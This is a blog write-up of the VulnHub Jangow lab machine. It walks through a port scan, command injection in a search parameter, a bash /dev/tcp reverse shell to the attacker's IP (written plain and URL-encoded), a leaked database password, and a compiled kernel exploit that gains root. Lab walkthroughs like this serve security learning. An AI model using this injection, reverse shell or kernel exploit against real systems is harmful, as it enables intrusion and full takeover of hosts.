VulnHub: Jangow: 1.0.1

Today we will take a look at Vulnhub: Jangow. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan
nmap -p- -sV -sC -oN result/nmap/log.txt --open 192.168.0.110

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)
Service Info: Host: 127.0.0.1; OS: Unix
  • Web

http://192.168.0.110/site/busque.php?buscar=ls

  • Reverse Shell
/bin/bash -l > /dev/tcp/192.168.0.107/443 0<&1 2>&1

we need to encode the url as we will execute in the url section

%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.107%2F80%200%3E%261%20%27
  • jangow01

Command: cat wordpress/config.php

<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>

Command: su jangow01

  • Root

Command: uname -a

Linux jangow01 4.4.0-31-generic

I found the exploit of this version.

jangow01@jangow01:/tmp$ nano exploit.cjangow01@jangow01:/tmp$ gcc exploit.c -o exploitjangow01@jangow01:/tmp$ ./exploit 
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003bb8b900
[*] Leaking sock struct from ffff880037952000
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880034d0ae40
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff880034d0ae40
[*] credentials patched, launching shell...
# /bin/bash -i
root@jangow01:/tmp# cd /root
root@jangow01:/root# ls
proof.txt
root@jangow01:/root# cat proof.txt

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

READ/DOWNLOAD> Cybersecurity for Beginners FULL BO

{UPDATE} My Virtual Talking Girl Hack Free Resources Generator

Security is crucial to any crypto project, especially to a new one.

Why is an experienced team of developers crucial in mobile app security?

PHAE Will be Available on CoinTiger on 13 January. 16,000 PHAE to Give Away!

{UPDATE} Pop Pixie Dress Up Hack Free Resources Generator

ETH Online starts this week!

How AutoShark got economically exploited

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: HA Joker CTF

SQL injection & Wordpress Explotiation: Welok, Try Hack Me

OverTheWire:~$ Bandit Level 8 → 9

Tryhackme Git Happens